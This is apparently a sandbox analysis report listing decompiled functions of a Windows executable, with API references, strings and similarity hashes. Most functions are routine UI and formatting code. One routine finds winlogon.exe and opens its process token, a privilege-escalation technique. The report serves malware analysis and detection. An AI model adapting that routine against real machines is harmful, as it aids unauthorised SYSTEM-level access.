CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

 , xrefs: 00407702
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<td bgcolor=#%s>%s, xrefs: 00407657
<tr>, xrefs: 00407661

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

6, xrefs: 004060B6
0, xrefs: 004060AE

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

L, xrefs: 0040378B
cfg, xrefs: 00403717

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
